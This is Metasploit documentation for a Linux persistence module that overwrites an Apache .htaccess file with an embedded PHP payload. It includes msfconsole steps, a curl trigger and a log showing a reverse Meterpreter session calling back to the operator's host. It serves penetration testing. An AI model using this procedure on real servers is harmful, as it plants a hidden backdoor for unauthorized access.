Back to Metasploit Framework

Apache Htaccess

documentation/modules/exploit/linux/persistence/apache_htaccess.md

6.4.1432.9 KB
Original Source

Vulnerable Application

This module targets Linux systems running an Apache web server with per-directory .htaccess overrides enabled (AllowOverride All) and PHP support enabled (mod_php). The module rewrites the target's .htaccess file so that Apache treats it as a PHP script (SetHandler application/x-httpd-php) and embeds a payload inside a PHP block. Requesting the .htaccess file over HTTP triggers execution of the embedded payload. Inspired by the htshells project.

Verification Steps

  1. Get a session on the target (shell or meterpreter)
  2. Start msfconsole
  3. Do: use exploit/linux/persistence/apache_htaccess
  4. Do: set SESSION <session_id>
  5. Do: set HTACCESS_PATH /var/www
  6. Do: set TARGET 0 for a PHP payload, or set TARGET 1 for a raw command payload
  7. Do: set PAYLOAD <payload matching the selected target>
  8. Do: run
  9. Trigger with: curl http://TARGET/.htaccess
  10. Verify a session/callback is received, or that the command executed as the Apache user (e.g. www-data)

Options

HTACCESS_PATH

Absolute path to the directory holding the .htaccess file to overwrite. The module reads/writes <HTACCESS_PATH>/.htaccess. The directory must have AllowOverride All enabled and be writable. (Default: /var/www/)

Scenarios

msf exploit(linux/persistence/apache_htaccess) > set session 1 
ssession => 1
msf exploit(linux/persistence/apache_htaccess) > set htaccess_path /var/www/html
htaccess_path => /var/www/html
msf exploit(linux/persistence/apache_htaccess) > run verbose=true 
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(linux/persistence/apache_htaccess) > 
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Apache is running and .htaccess is writable
[*] Backing up /var/www/html/.htaccess to loot...
[+] Backup saved to: /home/ms/.msf4/loot/20260703080243_default_10.5.134.171_htaccess.backup_313665.txt
[*] Writing payload to /var/www/html/.htaccess
[+] Payload written.
[*] Persistence is now available at .htaccess on target webserver
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/ubuntu2204x64_20260703.0243/ubuntu2204x64_20260703.0243.rc

After sending HTTP GET request to .htaccess:

msf exploit(linux/persistence/apache_htaccess) > [*] Sending stage (45755 bytes) to 10.5.134.171
[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.134.171:41738) at 2026-07-03 08:03:07 +0200

msf exploit(linux/persistence/apache_htaccess) > sessions -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : ubuntu2204x64
OS              : Linux ubuntu2204x64 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
Architecture    : x64
System Language : C
Meterpreter     : php/linux